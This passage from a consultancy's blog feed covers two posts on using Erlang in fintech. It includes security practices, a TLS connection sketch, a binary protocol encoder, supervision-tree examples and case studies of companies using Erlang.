&lt;p&gt;&lt;strong&gt;Implement Multi-Factor Authentication (MFA)&lt;/strong&gt;: Enhance user authentication by combining something the user knows (password) with something they have (token) or something they are (biometric verification).&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Regular Security Audits&lt;/strong&gt;: Conduct periodic security assessments and penetration testing.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Secure Coding Practices&lt;/strong&gt;: Emphasize code reviews, input validation, and adherence to secure coding standards.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Incident Response Planning&lt;/strong&gt;: Develop a comprehensive incident response plan.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Compliance Monitoring&lt;/strong&gt;: Use automated tools to ensure ongoing compliance with relevant regulations and standards.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Tokenization&lt;/strong&gt;: Replace sensitive data with tokens. In our applications, we&#39;ve implemented tokenization using UUIDs to minimize the exposure of sensitive information.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;API Security&lt;/strong&gt;: Secure APIs using OAuth 2.0, JWTs, and implement rate limiting. Erlang&#39;s capabilities make it efficient to handle secure API requests at scale.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;DevSecOps&lt;/strong&gt;: Integrate security into the development lifecycle. We incorporate security checks into our CI/CD pipelines to catch issues early.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Blockchain Technologies&lt;/strong&gt;: Leverage techniques from the blockchain world, such as immutable records and transparent transactions. We&#39;ve explored using Erlang to implement blockchain features like Merkle trees for data verification.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Property-Based Testing&lt;/strong&gt;: Use property-based testing to ensure that your systems behave correctly under a wide range of scenarios. This testing method generates a variety of inputs and checks system properties to ensure correctness and robustness.&lt;/p&gt;
&lt;/li&gt;
&lt;/ol&gt;
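&lt;p&gt;As an illustration of the first practice, here is a minimal sketch of opening an encrypted channel with Erlang&#39;s built-in &lt;code&gt;ssl&lt;/code&gt; application. The hostname and certificate paths are placeholders, not details from any real deployment:&lt;/p&gt;
&lt;pre&gt;&lt;code class=&quot;language-erlang&quot;&gt;-module(secure_channel).
-export([connect/0]).

%% Sketch: a mutually authenticated TLS connection using the ssl
%% application. Host, port, and certificate paths are placeholders.
connect() -&amp;gt;
    ok = ssl:start(),
    {ok, Socket} = ssl:connect(&amp;quot;payments.example.com&amp;quot;, 443, [
        binary,
        {active, false},
        {verify, verify_peer},
        {cacertfile, &amp;quot;/etc/ssl/certs/ca.pem&amp;quot;},
        {certfile, &amp;quot;/etc/ssl/certs/client.pem&amp;quot;},
        {keyfile, &amp;quot;/etc/ssl/private/client.key&amp;quot;}
    ]),
    {ok, Socket}.
&lt;/code&gt;&lt;/pre&gt;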
&lt;h2 id=&quot;leveraging-erlang-for-fintech-security&quot; tabindex=&quot;-1&quot;&gt;Leveraging Erlang for Fintech Security&lt;/h2&gt;
&lt;h3 id=&quot;secure-api-development&quot; tabindex=&quot;-1&quot;&gt;&lt;strong&gt;Secure API Development&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;Erlang&#39;s process isolation is ideal for developing secure APIs. Each process handles individual requests, ensuring that if one process is compromised or crashes, others remain unaffected.&lt;/p&gt;
&lt;h3 id=&quot;real-time-fraud-detection&quot; tabindex=&quot;-1&quot;&gt;&lt;strong&gt;Real-Time Fraud Detection&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;Erlang excels at handling concurrent processes, making it perfect for real-time fraud detection systems. By spawning a separate analysis process for each transaction, we can analyze patterns in parallel with the execution of the transaction.
This leads to lower latencies for transactions.&lt;/p&gt;
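&lt;p&gt;A minimal sketch of this pattern, where &lt;code&gt;fraud:analyze_patterns/1&lt;/code&gt; and &lt;code&gt;execute_transaction/1&lt;/code&gt; are hypothetical stand-ins for the real detection and settlement logic:&lt;/p&gt;
&lt;pre&gt;&lt;code class=&quot;language-erlang&quot;&gt;%% Fire-and-forget analysis: the spawned process runs in parallel,
%% so the transaction itself is never blocked by pattern analysis.
process_transaction(Tx) -&amp;gt;
    spawn(fun() -&amp;gt; fraud:analyze_patterns(Tx) end),
    execute_transaction(Tx).
&lt;/code&gt;&lt;/pre&gt;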
&lt;h3 id=&quot;implementing-protocols-with-binary-pattern-matching&quot; tabindex=&quot;-1&quot;&gt;&lt;strong&gt;Implementing Protocols with Binary Pattern Matching&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;Erlang&#39;s binary pattern matching simplifies implementing complex protocols like FIX SBE (Simple Binary Encoding).&lt;/p&gt;
&lt;pre&gt;&lt;code class=&quot;language-erlang&quot;&gt;-module(fix_sbe).
-export([encode_order/1, decode_order/1]).

-record(order, {
    order_id,
    price,
    quantity,
    side,
    symbol
}).

encode_order(Order) -&amp;gt;
    SymbolPadded = pad_symbol(Order#order.symbol, 6),
    Body = &amp;lt;&amp;lt;
        Order#order.order_id:64/big-unsigned,
        Order#order.price:64/float,
        Order#order.quantity:32/big-unsigned,
        Order#order.side:8/unsigned,
        SymbolPadded/binary
    &amp;gt;&amp;gt;,
    MsgLength = byte_size(Body) + 4,
    &amp;lt;&amp;lt;
        MsgLength:16/big-unsigned,
        1:16/big-unsigned, % Template ID for Order
        Body/binary
    &amp;gt;&amp;gt;.

decode_order(Binary) -&amp;gt;
    &amp;lt;&amp;lt;_MsgLength:16/big-unsigned, TemplateID:16/big-unsigned, Rest/binary&amp;gt;&amp;gt; = Binary,
    case TemplateID of
        1 -&amp;gt;
            decode_order_body(Rest);
        _ -&amp;gt;
            {error, unknown_template}
    end.

decode_order_body(&amp;lt;&amp;lt;OrderID:64/big-unsigned, Price:64/float, Quantity:32/big-unsigned, Side:8/unsigned, Symbol:6/binary&amp;gt;&amp;gt;) -&amp;gt;
    SymbolTrimmed = string:trim(Symbol, trailing, &amp;quot; &amp;quot;),
    {ok, #order{order_id = OrderID, price = Price, quantity = Quantity, side = Side, symbol = SymbolTrimmed}}.

pad_symbol(Symbol, Length) -&amp;gt;
    PaddingSize = Length - byte_size(Symbol),
    Padding = binary:copy(&amp;lt;&amp;lt;&amp;quot; &amp;quot;&amp;gt;&amp;gt;, PaddingSize),
    &amp;lt;&amp;lt; Symbol/binary, Padding/binary &amp;gt;&amp;gt;.
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;This code demonstrates how binary pattern matching handles complex binary protocols efficiently and, more importantly, in a very readable way.&lt;/p&gt;
&lt;h2 id=&quot;real-world-examples-of-erlang-in-action&quot; tabindex=&quot;-1&quot;&gt;Real-World Examples of Erlang in Action&lt;/h2&gt;
&lt;p&gt;At HappiHacking, we’ve collaborated with numerous companies to implement Erlang for secure and high-performance systems:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;WhatsApp&lt;/strong&gt; uses Erlang to maintain secure messaging for millions, leveraging its process isolation and concurrency to ensure fast and reliable communication.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Aeternity&lt;/strong&gt; utilizes Erlang for blockchain compliance, employing its features to handle secure transactions and uphold data integrity in regulated environments.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Kindio&lt;/strong&gt; relies on Erlang&#39;s fault tolerance and concurrency to manage Euro and SEK transactions securely in real-time across the European financial market.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Klarna&lt;/strong&gt; processes millions of payments daily with Erlang, which provides the reliability and real-time capabilities needed for secure global transactions.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Delta Exchange&lt;/strong&gt; deploys Erlang for high-frequency trading, utilizing its concurrency model to execute trades efficiently and securely.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Deutsche Telekom&lt;/strong&gt; partnered with HappiHacking to develop a GDPR-compliant data pipeline that processes 1 billion events daily, focusing on large-scale system architecture and data security.&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Erlang’s versatility extends beyond these examples:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Vocalink (Mastercard)&lt;/strong&gt; employs Erlang for robust financial switches powering national payment systems.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Goldman Sachs&lt;/strong&gt; integrates Erlang in its hedge fund trading platforms to achieve microsecond-level latency for market data processing and trading.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Nintendo&lt;/strong&gt; uses Erlang for its Switch console’s messaging, managing millions of concurrent connections, while &lt;strong&gt;Riot Games&lt;/strong&gt; relies on Erlang to support real-time communication for millions of players.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;AdRoll&lt;/strong&gt; processes half a million real-time bid requests per second using Erlang, optimizing ad placements with millisecond precision.&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id=&quot;conclusion&quot; tabindex=&quot;-1&quot;&gt;Conclusion&lt;/h2&gt;
&lt;p&gt;Security in fintech is non-negotiable. By leveraging Erlang&#39;s strengths, fintech companies can build systems that are not only secure but also scalable and resilient. At &lt;strong&gt;HappiHacking&lt;/strong&gt;, we&#39;ve harnessed Erlang to deliver solutions that meet the rigorous demands of the financial industry.&lt;/p&gt;
&lt;hr /&gt;
&lt;h2 id=&quot;explore-more-with-happihacking&quot; tabindex=&quot;-1&quot;&gt;Explore More with HappiHacking&lt;/h2&gt;
&lt;p&gt;For tailored support in building secure, reliable fintech systems, contact &lt;strong&gt;HappiHacking&lt;/strong&gt; at &lt;a href=&quot;mailto:info@happihacking.se&quot;&gt;info@happihacking.se&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;Reach out to &lt;a href=&quot;mailto:hello@kindio.se&quot;&gt;Kindio&lt;/a&gt; for secure, real-time management of Euro and SEK transactions.&lt;/p&gt;
&lt;p&gt;Check out these resources:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;&lt;a href=&quot;https://happihacking.com/resources/the-beam-book/&quot;&gt;The BEAM Book&lt;/a&gt;&lt;/strong&gt;: A comprehensive guide to the Erlang VM.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;&lt;a href=&quot;https://happihacking.com/blog/posts/2024/designing_concurrency/&quot;&gt;Designing Concurrency: The Erlang Way&lt;/a&gt;&lt;/strong&gt;: Insights into building concurrent applications.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;&lt;a href=&quot;https://happihacking.com/blog/posts/2023/neural_networks_elixir/&quot;&gt;Neural Networks in Elixir&lt;/a&gt;&lt;/strong&gt;: Exploring AI capabilities with Erlang and Elixir.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;&lt;a href=&quot;https://happihacking.com/blog/posts/2023/delta/&quot;&gt;Delta: Designing Financial Systems for Performance&lt;/a&gt;&lt;/strong&gt;: Strategies for optimizing financial systems.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;&lt;a href=&quot;https://aeternity.com/&quot;&gt;Aeternity Blockchain&lt;/a&gt;&lt;/strong&gt;: Leveraging Erlang in blockchain technology.&lt;/li&gt;
&lt;/ul&gt;
&lt;hr /&gt;
&lt;p&gt;&lt;strong&gt;About HappiHacking&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;At &lt;strong&gt;HappiHacking&lt;/strong&gt;, we specialize in developing high-performance, secure applications using Erlang and Elixir. With a focus on the financial industry, we bring expertise in building scalable systems that meet stringent security and compliance requirements.&lt;/p&gt;
&lt;p&gt;Visit our website: &lt;a href=&quot;https://happihacking.com/&quot;&gt;happihacking.com&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;Contact us: &lt;a href=&quot;mailto:info@happihacking.se&quot;&gt;info@happihacking.se&lt;/a&gt;&lt;/p&gt;
</content>
  </entry>
  
  <entry>
    <title>How Erlang Powers High-Volume Finance</title>
    <link href="https://happihacking.com/blog/posts/2024/erlang_for_fintech/"/>
    <updated>2024-09-11T00:00:00Z</updated>
    <id>https://happihacking.com/blog/posts/2024/erlang_for_fintech/</id>
    <summary>Build Scalable and Reliable Fintech Systems with Erlang</summary>
    <content type="html">&lt;div style=&quot;width: 98%; text-align: center;&quot;&gt; &lt;img class=&quot;img-panel&quot; src=&quot;https://happihacking.com/images/sunset_riddarfjarden.jpg&quot; alt=&quot;Erlang for Fintech Systems.&quot; style=&quot;width: 100%; object-fit: contain;&quot; title=&quot;Erlang for Fintech Systems.&quot; /&gt; &lt;/div&gt;
&lt;p&gt;Handling high-volume transactions efficiently is a must in fintech. Fintech companies need systems that scale easily, maintain low latency, and remain reliable under heavy loads.&lt;/p&gt;
&lt;p&gt;Erlang, initially created for the telecommunications industry, is ideal for fintech. Its features, such as lightweight concurrency, fault tolerance, and native support for distributed computing, make it effective for handling high transaction volumes with minimal latency and high reliability.&lt;/p&gt;
&lt;h2 id=&quot;the-challenge&quot; tabindex=&quot;-1&quot;&gt;The Challenge&lt;/h2&gt;
&lt;p&gt;High-volume transactions create unique challenges for fintech systems. Every payment, trade, or cross-border transaction must be processed rapidly and accurately. With thousands or even millions of transactions per second, these systems require low latency, high availability, and strong fault tolerance.&lt;/p&gt;
&lt;p&gt;To meet these demands, fintech systems must navigate several hurdles. Achieving high performance and low latency is crucial to avoid delays that can disrupt transactions. Security and data privacy are paramount, especially with growing concerns over cyber threats and regulatory requirements. Rapid changes in the market necessitate systems that are adaptable and resilient, able to recover quickly from failures. Integration with both internal and external systems, including legacy infrastructure, adds another layer of complexity. Fintech companies must also comply with a range of regulations while mitigating cybersecurity risks, making the choice of technology even more critical.&lt;/p&gt;
&lt;p&gt;When choosing a programming language, there is often a trade-off: lower-level languages may offer better performance but result in more complex solutions, while higher-level languages can simplify development but may struggle with performance. Erlang provides a compelling alternative by using a process-oriented programming model that simplifies concurrent programming, making it both easier and more efficient for handling high transaction volumes.&lt;/p&gt;
&lt;h2 id=&quot;why-erlang&quot; tabindex=&quot;-1&quot;&gt;Why Erlang?&lt;/h2&gt;
&lt;p&gt;Erlang stands out for its ability to handle high concurrency, distributed computing, and fault tolerance.&lt;/p&gt;
&lt;p&gt;Erlang was built with concurrency in mind. It allows developers to create lightweight processes that run independently and communicate through asynchronous message passing. Unlike traditional threads in other languages, Erlang processes are highly efficient, consuming minimal memory and resources. This allows systems built with Erlang to handle millions of simultaneous transactions without slowing down or crashing, making it ideal for high-frequency trading, payment processing, and other high-volume tasks.&lt;/p&gt;
&lt;p&gt;Erlang systems often follow the “let it crash” philosophy, where processes are designed to fail fast and recover quickly. Erlang’s built-in supervision trees automatically detect and restart failed processes without affecting the rest of the system. This architecture ensures that the system remains operational even under heavy loads or unexpected errors.&lt;/p&gt;
&lt;p&gt;Erlang was designed to run distributed applications across multiple nodes, making it perfect for fintech environments that need to scale across servers and data centers. It natively supports building distributed systems, allowing seamless communication between nodes and enabling redundancy and load balancing. This feature helps fintech companies manage high transaction volumes while ensuring data consistency and fault tolerance across all systems.&lt;/p&gt;
&lt;p&gt;One of Erlang’s most unique features is its ability to perform live code updates without requiring system downtime. This capability allows developers to deploy new features, security patches, and bug fixes without interrupting service. This is especially valuable for companies that operate around the clock and cannot afford downtime.&lt;/p&gt;
&lt;p&gt;Erlang’s design minimizes the time it takes to execute transactions and respond to events. Its virtual machine, BEAM, is optimized for low-latency operations, ensuring that messages between processes are handled with minimal delay. This real-time performance is essential for applications such as trading platforms and payment gateways, where even microsecond delays can impact transaction outcomes.&lt;/p&gt;
&lt;h2 id=&quot;erlang-in-the-real-world&quot; tabindex=&quot;-1&quot;&gt;Erlang in the real world&lt;/h2&gt;
&lt;p&gt;To understand how Erlang&#39;s unique capabilities translate into real-world benefits, let&#39;s look at some case studies and examples from companies that have successfully leveraged Erlang to handle high transaction volumes.&lt;/p&gt;
&lt;h3 id=&quot;klarna-scalable-payment-processing&quot; tabindex=&quot;-1&quot;&gt;Klarna - Scalable Payment Processing&lt;/h3&gt;
&lt;p&gt;Klarna, a leading payment provider, uses Erlang to manage its payment infrastructure. Klarna processes millions of transactions daily, requiring a robust and scalable system that can handle spikes in traffic without compromising performance. Using Erlang, Klarna can manage concurrent payment requests efficiently, reducing latency and ensuring high availability. Erlang’s fault-tolerant architecture allows Klarna to maintain seamless service even during unexpected outages, minimizing downtime and ensuring customer reliability.&lt;/p&gt;
&lt;h3 id=&quot;telecommunications-a-proven-model-for-scalability-and-reliability&quot; tabindex=&quot;-1&quot;&gt;Telecommunications - A Proven Model for Scalability and Reliability&lt;/h3&gt;
&lt;p&gt;Although not initially a fintech example, the use of Erlang in the telecommunications industry provides a strong parallel. Telecom networks must manage millions of concurrent connections with high uptime requirements, similar to what’s needed in fintech for real-time trading or large-scale payment processing. Ericsson initially created Erlang to handle these exact challenges, and its adoption across telecom giants demonstrates its ability to maintain performance under heavy loads.&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;China Telecom (via EMQx):&lt;/strong&gt; Relies on Erlang for its EMQx MQTT broker, which supports massive-scale IoT applications and real-time messaging systems. Erlang enables the system to handle millions of messages per second with low latency and high fault tolerance.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Telia:&lt;/strong&gt; Uses Erlang as a core component in its Telia ACE contact center solution, particularly for its &amp;quot;Call Guide&amp;quot; (also known as ACE) system. Telia ACE leverages Erlang to efficiently manage customer interactions across various channels, including voice, chat, and social media, ensuring high availability and responsiveness.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Cisco:&lt;/strong&gt; Utilizes Erlang for its NETCONF (Network Configuration Protocol) implementation. NETCONF is a protocol used for network device configuration, and Erlang’s concurrency model allows Cisco to manage multiple configuration sessions simultaneously with high reliability. According to Cisco, 90% of all Internet traffic goes through Erlang-controlled nodes.&lt;/li&gt;
&lt;/ul&gt;
&lt;h3 id=&quot;whatsapp-messaging-at-scale&quot; tabindex=&quot;-1&quot;&gt;WhatsApp - Messaging at Scale&lt;/h3&gt;
&lt;p&gt;WhatsApp, one of the most popular messaging platforms globally, uses Erlang to manage its massive user base. Although WhatsApp isn’t a fintech company, the scale at which it operates is comparable. Handling billions of messages daily, WhatsApp relies on Erlang’s concurrency model to deliver messages in real-time without delays.&lt;/p&gt;
&lt;h3 id=&quot;kindio-real-time-euro-and-sek-transactions&quot; tabindex=&quot;-1&quot;&gt;Kindio - Real-Time Euro and SEK Transactions&lt;/h3&gt;
&lt;p&gt;&lt;a href=&quot;https://www.kindio.se/&quot;&gt;Kindio&lt;/a&gt;, a fintech company specializing in real-time Euro and SEK transactions, leverages Erlang to ensure its settlement systems remain responsive and efficient under heavy load. Using Erlang, Kindio can manage complex transaction flows and ensure compliance with European payment regulations while maintaining optimal performance. Kindio’s use of Erlang enables it to offer instant transactions with minimal latency, providing a reliable and scalable solution.&lt;/p&gt;
&lt;h2 id=&quot;architectural-considerations-when-building-with-erlang&quot; tabindex=&quot;-1&quot;&gt;Architectural considerations when building with Erlang&lt;/h2&gt;
&lt;p&gt;Erlang provides a middle ground between the complexity of microservices and the limitations of monolithic architectures. While microservices can bring about challenges such as increased operational complexity, communication overhead, and inefficient distributed data management, monoliths often face slow development speed, scalability issues, and complicated deployments. Erlang tackles these issues by allowing for a modular monolithic architecture with a &amp;quot;share-nothing&amp;quot; data model.&lt;/p&gt;
&lt;p&gt;Erlang’s approach provides the advantages of both microservices and monoliths while minimizing their respective drawbacks. With Erlang, you can build a modular system that maintains the simplicity and coherence of a monolith but without the rigidity that typically hampers scalability and flexibility. Each module or service runs independently, enabling faster development and deployment cycles while maintaining robust fault tolerance and scalability.&lt;/p&gt;
&lt;p&gt;The &amp;quot;share-nothing&amp;quot; architecture means that each process has its own memory and does not directly interfere with others. This allows for seamless scalability, as each process can be managed, scaled, or replaced independently, much like a microservices architecture. However, unlike typical microservices, you avoid the significant overhead of managing multiple services, complex inter-service communication, and data consistency across a distributed network.&lt;/p&gt;
&lt;h2 id=&quot;leveraging-erlangs-otp-open-telecom-platform&quot; tabindex=&quot;-1&quot;&gt;Leveraging Erlang’s OTP (Open Telecom Platform)&lt;/h2&gt;
&lt;p&gt;Erlang&#39;s Open Telecom Platform (OTP) is a powerful framework that provides the building blocks needed to create robust, scalable, and fault-tolerant systems. OTP also provides a collection of design principles that guide the development of concurrent and distributed applications.&lt;/p&gt;
&lt;p&gt;A key feature of OTP is its supervision trees, which are designed to monitor processes and automatically restart them if they fail. This fault-tolerance model ensures that the system remains stable even when individual components encounter errors, making it ideal for applications where uptime is non-negotiable.&lt;/p&gt;
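&lt;p&gt;To make supervision trees concrete, here is a minimal supervisor sketch; &lt;code&gt;payment_worker&lt;/code&gt; is a hypothetical worker module, not code from any specific project:&lt;/p&gt;
&lt;pre&gt;&lt;code class=&quot;language-erlang&quot;&gt;-module(payment_sup).
-behaviour(supervisor).
-export([start_link/0, init/1]).

start_link() -&amp;gt;
    supervisor:start_link({local, ?MODULE}, ?MODULE, []).

%% one_for_one: restart only the crashed child, up to 5 times
%% within 10 seconds, leaving its siblings untouched.
init([]) -&amp;gt;
    SupFlags = #{strategy =&amp;gt; one_for_one, intensity =&amp;gt; 5, period =&amp;gt; 10},
    Children = [#{id =&amp;gt; payment_worker,
                  start =&amp;gt; {payment_worker, start_link, []}}],
    {ok, {SupFlags, Children}}.
&lt;/code&gt;&lt;/pre&gt;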
&lt;p&gt;Erlang’s OTP framework also supports hot code swapping, enabling developers to update and modify applications without stopping the system. This is particularly valuable in fintech, where continuous deployment and the need for rapid feature updates or security patches are common.&lt;/p&gt;
&lt;h2 id=&quot;best-practices-for-erlang-in-fintech-systems&quot; tabindex=&quot;-1&quot;&gt;Best Practices for Erlang in Fintech Systems&lt;/h2&gt;
&lt;p&gt;To maximize Erlang&#39;s potential in fintech environments, it&#39;s important to adopt certain best practices. Efficient process management should be fully utilized by designing systems where each transaction or user session is isolated. This approach minimizes the impact of any single failure and allows the system to handle high volumes of concurrent transactions without performance degradation.&lt;/p&gt;
&lt;p&gt;Asynchronous messaging should be used wherever possible. In Erlang, processes communicate through message passing, and keeping these messages non-blocking is vital for maintaining low latency and high throughput.&lt;/p&gt;
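&lt;p&gt;A small sketch of non-blocking message passing; the process and message names here are illustrative only:&lt;/p&gt;
&lt;pre&gt;&lt;code class=&quot;language-erlang&quot;&gt;start_settler() -&amp;gt;
    spawn(fun settle_loop/0).

settle_loop() -&amp;gt;
    receive
        {settle, TxId} -&amp;gt;
            io:format(&amp;quot;settling ~p~n&amp;quot;, [TxId]),
            settle_loop()
    end.

%% The send operator (!) returns immediately, so the caller
%% is never blocked waiting for the settler to finish.
submit(Settler, TxId) -&amp;gt;
    Settler ! {settle, TxId},
    ok.
&lt;/code&gt;&lt;/pre&gt;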
&lt;p&gt;Hot code swapping should be leveraged to enable rapid deployment of new features, bug fixes, and security updates without causing disruptions.&lt;/p&gt;
&lt;p&gt;Building a distributed architecture is also essential for maximizing Erlang’s benefits in fintech. Erlang&#39;s native support for distributed systems makes it easy to run applications across multiple nodes, which enhances scalability and redundancy.&lt;/p&gt;
&lt;h2 id=&quot;overcoming-common-challenges-when-adopting-erlang&quot; tabindex=&quot;-1&quot;&gt;Overcoming Common Challenges When Adopting Erlang&lt;/h2&gt;
&lt;p&gt;While Erlang offers substantial benefits, some organizations may face perceived challenges when adopting it, such as concerns about a steep learning curve or integrating with existing technology stacks. However, Erlang&#39;s design makes it surprisingly easy to learn for developers who are already proficient in other languages, allowing them to become productive in just a few weeks. The language’s syntax is straightforward, and its functional programming model, while different from imperative styles, is intuitive for developers who are open to thinking in terms of processes and message-passing.&lt;/p&gt;
&lt;p&gt;To overcome initial hesitations, companies should focus on effective onboarding and training. Introducing developers to Erlang through hands-on workshops, guided tutorials, and real-world problem-solving exercises can accelerate the learning process. Engaging experienced Erlang mentors or consultants, such as those from Happi Hacking, can also help flatten the learning curve, providing practical insights and best practices from seasoned professionals. Additionally, leveraging the rich community resources available online, such as forums, open-source projects, and documentation, can support developers in quickly getting up to speed.&lt;/p&gt;
&lt;p&gt;Integrating Erlang with an existing technology stack, which might already include languages like Python, Java, or C#, can also be a concern. However, Erlang is highly interoperable, and its distributed architecture makes it well-suited to work alongside other systems. Hybrid systems where Erlang handles the concurrent and fault-tolerant components while other languages manage user interfaces, reporting, or legacy functions are feasible. APIs, middleware, and libraries help ensure that Erlang-based applications communicate effectively with existing systems. Erlang’s compatibility with Elixir also offers a pathway for organizations to gradually adopt Erlang’s strengths while leveraging their existing development talent.&lt;/p&gt;
&lt;p&gt;Performance tuning is another area where developers may initially struggle, but Erlang provides powerful and well-documented tools and techniques for optimization. Regular monitoring using tools like &lt;code&gt;observer&lt;/code&gt; and &lt;code&gt;recon&lt;/code&gt;, along with proactive performance adjustments such as garbage collection tuning and optimizing process handling, can significantly improve system performance. Encouraging developers to experiment with these tools and techniques in controlled environments can help build confidence and expertise.&lt;/p&gt;
&lt;h2 id=&quot;the-future-of-erlang-in-fintech&quot; tabindex=&quot;-1&quot;&gt;The Future of Erlang in Fintech&lt;/h2&gt;
&lt;p&gt;As fintech continues to evolve, the demand for systems that are both highly scalable and resilient will only increase. Erlang is well-positioned due to its strengths in managing concurrency, fault tolerance, and distributed computing. The future of Erlang in fintech looks promising, particularly as financial services continue to shift towards real-time transactions, greater automation, and increasingly complex regulatory requirements.&lt;/p&gt;
&lt;p&gt;One area where Erlang is expected to shine is in real-time payments and settlement systems. As instant payments become more ubiquitous, the need for reliable, low-latency processing will grow. Erlang&#39;s capabilities align perfectly with this need, making it an ideal choice for powering back-end systems that handle high-frequency trading, cross-border payments, and instantaneous currency exchanges. Moreover, as digital currencies and blockchain technology gain traction, Erlang&#39;s ability to handle large volumes of transactions in a secure and efficient manner will make it a valuable tool for developing and managing blockchain nodes and decentralized finance (DeFi) platforms.&lt;/p&gt;
&lt;p&gt;Erlang is also likely to find increased application in the realm of artificial intelligence (AI) and machine learning (ML) within fintech. With its strong support for real-time data processing and distributed computing, Erlang can be used to build AI-driven analytics platforms that detect fraud, predict market trends, and enhance customer experiences. As the financial industry increasingly adopts AI and ML for real-time decision-making, Erlang&#39;s unique advantages in handling large-scale, real-time data flows will become even more relevant.&lt;/p&gt;
&lt;p&gt;The potential for Erlang to integrate with emerging technologies, such as edge computing, also positions it well for future growth. As the fintech industry continues to innovate, Erlang&#39;s flexibility and adaptability will make it a suitable choice for companies looking to stay ahead of technological trends. Its compatibility with Elixir, a language designed for scalable web development, further broadens its applicability in developing customer-facing platforms that require real-time data processing and high concurrency.&lt;/p&gt;
&lt;p&gt;Looking ahead, I hope to see more fintech companies recognize the unique advantages of Erlang and consider it as a strategic choice for building their systems. With its proven capabilities in delivering reliability, scalability, and performance, Erlang has the potential to become a key technology for those seeking to build robust, high-volume transaction systems.&lt;/p&gt;
&lt;h2 id=&quot;conclusion-and-call-to-action&quot; tabindex=&quot;-1&quot;&gt;Conclusion and Call to Action&lt;/h2&gt;
&lt;p&gt;Erlang offers a powerful solution for fintech companies aiming to build reliable, scalable systems capable of handling high transaction volumes. Its unique features, such as fault tolerance, real-time performance, and efficient process management, make it an ideal choice for the evolving needs of the financial sector. As real-time payments, AI-driven analytics, and advanced technology integration continue to shape the future of fintech, Erlang&#39;s relevance will only grow.&lt;/p&gt;
&lt;p&gt;I hope more fintech companies will explore the benefits of using Erlang to optimize their systems, leveraging its strengths to stay competitive and meet the demands of an ever-changing market. If you&#39;re looking to harness Erlang&#39;s potential, Happi Hacking can provide expert consultancy services to guide you in building high-performance systems. Additionally, Kindio is available to assist with managing Euro and SEK transactions, ensuring compliance and efficiency.&lt;/p&gt;
&lt;p&gt;To deepen your understanding of Erlang and its applications, check out these resources:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;&lt;a href=&quot;https://happihacking.com/resources/the-beam-book/&quot;&gt;The BEAM Book&lt;/a&gt;:&lt;/strong&gt; A comprehensive guide to the Erlang virtual machine, ideal for developers looking to get started with or deepen their knowledge of Erlang.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;&lt;a href=&quot;https://happihacking.com/blog/posts/2024/designing_concurrency/&quot;&gt;Designing Concurrency: The Erlang Way&lt;/a&gt;:&lt;/strong&gt; An article that dives into the principles of designing concurrent applications using Erlang, providing practical insights and examples.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;&lt;a href=&quot;https://happihacking.com/blog/posts/2023/neural_networks_elixir/&quot;&gt;Neural Networks in Elixir&lt;/a&gt;:&lt;/strong&gt; Explore how Elixir, a language built on the Erlang VM, can be used for building scalable machine learning applications.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;&lt;a href=&quot;https://happihacking.com/blog/posts/2023/delta/&quot;&gt;Delta: Designing Financial Systems for Performance&lt;/a&gt;:&lt;/strong&gt; An article discussing the principles of designing high-performance financial systems, relevant to those using Erlang in fintech.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;&lt;a href=&quot;https://aeternity.com/&quot;&gt;Aeternity Blockchain&lt;/a&gt;:&lt;/strong&gt; Learn about Aeternity, a blockchain platform that uses Erlang for its backend, highlighting the language’s applications in blockchain technology.&lt;/li&gt;
